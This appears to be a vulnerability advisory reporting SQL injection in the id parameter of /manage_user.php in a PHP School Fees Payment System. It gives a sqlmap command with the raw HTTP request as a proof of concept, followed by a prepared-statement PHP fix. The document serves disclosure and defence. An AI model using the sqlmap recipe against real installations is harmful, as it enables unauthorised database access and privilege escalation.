[description]

School Fees Payment System was discovered to contain a SQL Injection vulnerability via the URI /manage_user.php.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

https://www.sourcecodester.com/php/14567/school-fees-payment-system-using-phpmysqli-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC] sqlmap commands:

python sqlmap.py -r C:\Users\Administrator\Desktop\a.txt --batch --banner --flush-session

a.txt (the request file passed to sqlmap with -r):

GET /manage_user.php?id=1 HTTP/1.1
Host: localhost
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept: */*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php?page=users
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=ku92iqbs3e1fpskj8d0jev1unj
Connection: keep-alive
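
[Mitigation example]

One way to close an injection point of the kind reported for /manage_user.php?id=, added here as an example; it is not code from the School Fees Payment System. The `users` table, its column names, the connection settings and the `load_user` helper are assumptions.

```php
<?php
// Added example: hypothetical handler for GET /manage_user.php?id=<n>.
// The `users` table, its columns and the credentials are assumptions.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

// Vulnerable pattern, shown for contrast only: the raw parameter becomes
// part of the SQL text, so the database parses its content as SQL.
//   $row = $conn->query("SELECT * FROM users WHERE id = " . $_GET['id']);

function load_user(mysqli $conn, $rawId): ?array
{
    // 1. Validate: accept a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind: the value is sent separately from the statement text,
    //    so it can never change the structure of the query.
    $stmt = $conn->prepare('SELECT id, name, username FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // null when no row matches
    $stmt->close();

    return $row ?: null;
}

// Placeholder connection settings; use a least-privilege database account.
$conn = new mysqli('localhost', 'app_user', 'change-me', 'school_fees_db');

$user = load_user($conn, $_GET['id'] ?? null);
if ($user === null) {
    http_response_code(400);
    exit('Invalid or unknown user id');
}

// Encode on output so stored values are not interpreted as markup.
echo htmlspecialchars($user['name'], ENT_QUOTES, 'UTF-8');
```

With this handler the request in a.txt still returns the user with id 1, while any id value that is not a plain positive integer is rejected before a query is built.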


